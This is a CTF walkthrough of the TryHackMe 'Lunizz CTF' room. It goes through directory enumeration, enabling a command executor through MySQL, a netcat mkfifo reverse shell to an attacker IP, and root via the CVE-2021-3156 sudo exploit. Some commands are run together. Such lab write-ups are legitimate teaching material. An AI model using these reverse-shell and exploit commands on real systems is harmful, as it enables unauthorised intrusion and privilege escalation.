Lunizz CTF Tryhackme Writeup
By Shamsher khan This is a Writeup of Tryhackme room “Lunizz CTF”
Room link: https://tryhackme.com/room/lunizzctfnd
Note: This room is Free
Enumeration
Directory Brute Forcing with Gubuster
We saw port 80 is open, so let’s brute force the directories and files which are exposed by this web server using ffuf:
gobuster dir -u http://10.10.106.159/ -w directory-list-2.3-medium.txt -x .php,.html,.txt
http://10.10.106.159/whateverThe “whatever” directory looks interesting as this indicates that we can run commands on the server,but the mode looks to be disabled:
/instructions.txt
Q.1: What is the default password for MySQL
As we can see we found a user runcheck for mysql and a corresponding default password.Lets connect to the database using this user and password:
Login into Mysql
We connect to the database let’s explore the database
Q.2: I can’t run commands, there must be a MySQL column that controls command executor
From the Table “runcheck”, we were able to find the name of the column which looks to be controlling the command executer as it’s value is 0 currently. We can update this value to 1 and check if we can exeute something.
Now as the colums value is update, lets check if we can execute commands:
Q.3: a folder shouldn’t be.
Lets execute “ls -lrt /” and we will get our answer of the above question.
Reverse Shell
From the command executor we can also get a reverse shell now.Execute the following from the executor after staring a netcat listener on your kali/attacker machine:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.12.26 4444 >/tmp/f
Upgrade shell
script -qc /bin/bash /dev/nullexport TERM=xterm
control+z to background
stty raw -echo;fg
Exploring the directory /proct which we found earlier and also highlighted by LinPEAS we found a python file with the following code:
i try to crack password but bad luck
It seems like this version of sudo is vulnerable to the CVE-2021-3156 vulnerability. This exploit abuses all sudo versions lower than version 1.8.31. This vulnerability gives you root privileges right away! We should also check which Ubuntu version is installed by running: lsb_release -a. Running this command should give you the following output:
Now that we know this box is vulnerable to CVE-2021-3156, let’s try to run an exploit! I found a script on GitHub that exploits the vulnerability mentioned above. Run the following code:
git clone https://github.com/blasty/CVE-2021-3156.gittar - cvzf sudo.tar.gz CVE-2021-3156/
python3 -m http.server
Then on the box run:
available targets:
------------------------------------------------------------
0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28We are running on Ubuntu 18.04 with sudo version 1.8.21. That is why we have to run the 0 option. Do so by running:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
The root.txt flag is located at /root/root.txt. The user.txt flag is located at /home/adam/user.txt.
This box was different from other boxes I have rooted before. The questions were a bit misleading since we exploited a vulnerability instead of brute-forcing. In the end, the CVE-2021-3156 vulnerability helped us root the box.
Q.4: hi adam, do you remember our place?
Open this link you will get map
https://www.google.com/maps/@68.5090469,27.481808,2a,75y,313.8h,103.6t/data=!3m7!1e1!3m5!1skJPO1zlKRtMAAAQZLDcQIQ!2e0!3e2!7i10000!8i5000Answer: Northern Lights
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!
